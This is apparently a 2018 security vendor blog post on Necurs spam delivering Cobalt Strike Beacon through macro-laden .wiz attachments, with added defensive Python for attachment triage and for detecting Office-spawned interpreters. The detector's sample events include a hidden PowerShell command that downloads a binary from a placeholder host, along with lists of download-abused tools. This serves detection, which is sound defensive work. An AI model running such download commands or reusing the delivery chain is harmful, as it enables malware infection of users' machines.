Barkly vs Malware
Barkly Research
Sep 2018

New Necurs Spam Campaign Targets Banks with Malicious .Wiz Files

Photo by Chris Christian

The latest trick attackers are using to bypass security and fool users into downloading malware involves .wiz file attachments. Here's what you need to know.

It's been a summer of experimentation for attackers leveraging the Necurs botnet. In late May and early June, large waves of Necurs-distributed spam emails were spotted carrying malicious Excel Web Query (.iqy) files. These legitimate, deceptively simple files blew right past email filters and antivirus scanners on their way to infecting victims with a second-stage payload (the FlawedAmmyy RAT). 

In July, the criminal group TA505 leveraged Necurs to distribute PDFs with another newly-exploited legitimate file type inside — .SettingContent-ms files. Once again, the payload these legitimate files were abused to retrieve was the FlawedAmmyy RAT. 

With Microsoft and Adobe both taking action to neuter .SettingContent-ms file abuse, attackers turned back to .iqy files for campaigns distributing the Marap downloader in early August. They also experimented with hiding them inside PDFs and password-protected ZIP archives to continue bypassing filters. 

Later that month, however, Necurs campaigns were spotted carrying a third legitimate file type — Microsoft Publisher (.pub) files. After initially including the .pub files as standalone attachments, attackers soon began embedding them inside PDF attachments to try their luck that way, as well. 

Now, with the summer winding down, Necurs attack campaigns and their experimentation with legitimate file types still appear to be heating up. Most recently, researchers @SettiDavide89, @hexlax, @James_inthe_box, and others have spotted spam emails distributing malicious Wizard (.wiz) files — files used by Microsoft programs such as Word to guide users through complex or repetitive tasks.

What the new .wiz file campaigns look like

Among those tracking the .wiz file campaign were researchers at Trend Micro, who provided an example of what one of the spam emails looked like:

Email disguised as an invoice notification with malicious .wiz file attached. Source: Trend Micro

As with previous spam emails distributed via Necurs, the email itself is incredibly basic, with a subject line referring to an invoice and the simple body text "please find attached."

This is just one example. Necurs campaigns typically deploy a variety of different types of emails, all based on a handful of basic templates. Specific subject lines and messages can vary, but they generally tend to refer to invoices, payment notifications, scans, sales requests, etc. If you're interested, we've collected a list of email subject lines and "lures" they've used, along with screenshots, here.

The attached .wiz files open in Microsoft Word and contain an embedded macro in charge of retrieving and executing the second-stage payload — in this case, Cobalt Strike Beacon.

The .wiz file attachment opens in Word. Enabling content triggers the execution of an embedded macro that retrieves and executes a second-stage payload.
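The post's running theme is that each of these file types is legitimate, so filters keyed on "known bad" miss them. The following is an added example, not code from the Barkly post, of the kind of mail-gateway triage a defender can layer in front of users: it flags the extensions the post reports being abused (.wiz, .iqy, .SettingContent-ms, .pub), treats the PDF and ZIP wrappers the post mentions as "unpack and re-check", and applies a byte-level heuristic for a VBA project inside an OLE (Compound File) or OOXML document regardless of the name on the attachment. The assumption that a .wiz file is an OLE container in the same family as .doc/.dot is mine; the VBA markers are a heuristic, not a parser; and every attachment in `SAMPLE_ATTACHMENTS` is constructed, not a real sample.

```python
# Added example (not from the Barkly post): mail-gateway triage for the legitimate
# file types the post reports being abused by Necurs campaigns. The OLE/VBA checks
# are heuristics, and every attachment below is constructed, not a real sample.
import os

# Extensions the post reports being abused in 2018 Necurs campaigns.
WATCHED_EXTENSIONS = {".wiz", ".iqy", ".settingcontent-ms", ".pub"}
# Containers the post says were used to wrap those files past filters.
WRAPPERS = {".pdf", ".zip"}
# Ordinary Office extensions where an OLE or OOXML container is expected.
OFFICE_EXTENSIONS = {".doc", ".dot", ".xls", ".xlt", ".ppt", ".docx", ".docm",
                     ".xlsx", ".xlsm", ".pptx", ".pptm"}

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # Compound File Binary header
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML documents are ZIP archives
# Directory-entry names that mark a VBA project: stored UTF-16LE inside an OLE
# file, and as a plain path ("word/vbaProject.bin") inside an OOXML zip.
OLE_VBA_MARKERS = ("_VBA_PROJECT".encode("utf-16-le"), "Macros".encode("utf-16-le"))
OOXML_VBA_MARKER = b"vbaProject.bin"


def extension_of(name):
    """Lower-cased extension, so 'Invoice.SettingContent-ms' -> '.settingcontent-ms'."""
    return os.path.splitext(name.lower())[1]


def has_vba(data):
    """Heuristic: does the container look like it carries a VBA project?"""
    if data.startswith(OLE_MAGIC):
        return any(marker in data for marker in OLE_VBA_MARKERS)
    if data.startswith(ZIP_MAGIC):
        return OOXML_VBA_MARKER in data
    return False


def triage_attachment(name, data):
    """Return (verdict, reason) for one attachment: 'block', 'review' or 'allow'."""
    ext = extension_of(name)
    if ext in WATCHED_EXTENSIONS:
        return "block", f"extension {ext} is on the abused-file-type watch list"
    if has_vba(data):
        return "block", "document carries a VBA project"
    if data.startswith(OLE_MAGIC) and ext not in OFFICE_EXTENSIONS:
        # A Word/Publisher-style container under a non-Office name is worth a look.
        return "review", f"OLE compound file with unexpected extension {ext or '(none)'}"
    if ext in WRAPPERS:
        return "review", f"{ext} container may wrap a watched file type; unpack and re-triage"
    return "allow", "no indicator"


def triage_message(attachments):
    """Triage every (name, bytes) pair; the message verdict is the worst attachment verdict."""
    severity = {"allow": 0, "review": 1, "block": 2}
    results = [(name,) + triage_attachment(name, data) for name, data in attachments]
    worst = max((r[1] for r in results), key=severity.__getitem__, default="allow")
    return worst, results


# Constructed attachments: just enough bytes to exercise each branch.
SAMPLE_ATTACHMENTS = [
    ("invoice_8837.wiz", OLE_MAGIC + b"\x00" * 24 + OLE_VBA_MARKERS[0]),
    ("report.doc", OLE_MAGIC + b"\x00" * 24 + "Macros".encode("utf-16-le")),
    ("quarterly.docx", ZIP_MAGIC + b"\x00" * 8 + b"word/vbaProject.bin"),
    ("scan.pdf", b"%PDF-1.4\n%constructed placeholder\n"),
    ("notes.txt", b"please find attached\n"),
]

if __name__ == "__main__":
    verdict, per_attachment = triage_message(SAMPLE_ATTACHMENTS)
    print("message verdict:", verdict)
    for name, decision, reason in per_attachment:
        print(f"  {name:20} {decision:7} {reason}")
```

The extension list is a policy decision: blocking `.wiz` outright costs almost nothing in most organizations because legitimate wizard files are rarely mailed, whereas `.pdf` and `.zip` can only be sent for unpacking and a second pass. The VBA check is deliberately crude; in production you would hand the bytes to a real OLE parser rather than substring-match directory names.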

Other similarities and differences from previous Necurs campaigns 

The use of Cobalt Strike's Beacon marks an interesting departure from previous Necurs campaigns. Beacon is the payload for Cobalt Strike, a penetration testing framework used by red teams. It establishes a connection between target and attacker-controlled machines and facilitates the remote execution of commands, laying the groundwork for a broad range of attack activities.

While Cobalt Strike was designed to help red teams conduct valid penetration testing exercises, it has a history of being abused for criminal activity — most notoriously by a hacking group that security experts began referring to as the Cobalt Group after they were found utilizing the tool in real attacks targeting financial institutions. 

Due to the manual work required to take advantage of a Cobalt Strike Beacon installation, however, the attack campaigns it gets (mis)used in tend to be small and highly targeted. Necurs campaigns, on the other hand, tend to be high-volume affairs. While many of this summer's Necurs campaigns do appear to be targeting financial institutions, in particular, they are still large enough for this to be a somewhat odd choice in payload. 

That said, the connection between this campaign and previous Necurs campaigns is clear. For one thing, the embedded macro used in this campaign bears significant similarities to the macro used in previous Necurs campaigns that utilized malicious Microsoft Publisher files.

The macro embedded in the .wiz file campaign distributing a Cobalt Strike Beacon payload.

The macro embedded in Microsoft Publisher files used in previous Necurs campaigns.

In addition, the Cobalt Strike Beacon payload utilizes the same code signing certificate that was seen assigned to the FlawedAmmyy RAT payloads in previous Necurs campaigns. 

One potential theory regarding the use of Cobalt Strike is that this campaign may have been designed primarily as an initial test to validate the use of .wiz files in larger campaigns distributing other payloads further down the road. We'll be following events closely to see whether or not .wiz files become a regular go-to in attackers' rapidly expanding arsenal of legitimate file types to abuse.

Barkly blocks malicious abuse of .wiz files

Barkly customers are protected from these attacks thanks to Barkly's ability to observe and block suspicious process patterns. Unlike the majority of antivirus solutions, which are limited to signature matching and static file analysis, Barkly can step back, see the big picture, and understand that Office applications being used to launch command interpreters and download something from the Internet constitutes suspicious activity that is better off blocked.

In that way, Barkly serves as a crucial safety net, allowing admins to rest easy knowing their machines are protected even if end users (or AVs) get fooled by these otherwise legitimate file formats.
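The pattern described above (an Office application launching a command interpreter, which then fetches something from the Internet) is something any team with process-creation telemetry can alert on, whatever product they run. The following is an added example, not Barkly's code: a small detector over Sysmon/EDR-style process events that walks each process's ancestry, flags interpreters and script hosts that descend from an Office application, and raises the severity when the command line carries a download hint. The field names, the executable lists and every event in `SAMPLE_EVENTS` are constructed for illustration (the URL is the reserved `example.invalid` domain).

```python
# Added example (not Barkly's code): detect the process chain the post describes --
# an Office application spawning a command interpreter or script host, optionally
# with a download in the command line. All events below are constructed.

OFFICE_APPS = {"winword.exe", "excel.exe", "mspub.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Substrings that indicate the interpreter is being used to pull something down.
DOWNLOAD_HINTS = ("http://", "https://", "downloadstring", "downloadfile",
                  "invoke-webrequest", "urlcache", "webclient", "bitstransfer")

# Constructed process-creation events (simplified Sysmon Event ID 1 / EDR fields).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice_8837.wiz"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell -w hidden -f C:\Users\alice\AppData\Local\Temp\s.ps1"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/b.bin -OutFile $env:TEMP\b.bin"'},
    # Benign: a shell started from Explorer, not from an Office application.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def image_name(path):
    """Bare lower-cased executable name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid):
    """Process chain from the oldest known ancestor down to pid (cycle-safe)."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    chain.reverse()
    return chain


def detect(events):
    """Return one alert per interpreter/script host that descends from an Office app."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if image_name(ev["image"]) not in INTERPRETERS:
            continue
        chain = ancestry(ev["pid"], by_pid)
        names = [image_name(e["image"]) for e in chain]
        # Any Office application above this process (not the process itself) qualifies,
        # so cmd -> powershell under Word is caught even though Word is two hops up.
        if not any(n in OFFICE_APPS for n in names[:-1]):
            continue
        cmd = ev["cmdline"].lower()
        downloads = any(hint in cmd for hint in DOWNLOAD_HINTS)
        alerts.append({
            "pid": ev["pid"],
            "severity": "high" if downloads else "medium",
            "chain": " -> ".join(names),
            "cmdline": ev["cmdline"],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] pid {alert['pid']}: {alert['chain']}")
        print(f"         {alert['cmdline']}")
```

Two design points worth noting. Walking the full ancestry rather than checking only the direct parent matters because macros commonly go through `cmd.exe` before reaching PowerShell, as in the constructed sample. And the download hint only raises severity; the Office-to-interpreter chain is alert-worthy on its own, since the second stage may be fetched by a child process whose command line you never see.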

Want to see Barkly in action for yourself? Sign up to test it out.  

Want to stay up-to-date on this and other threats? Subscribe to the Barkly blog.
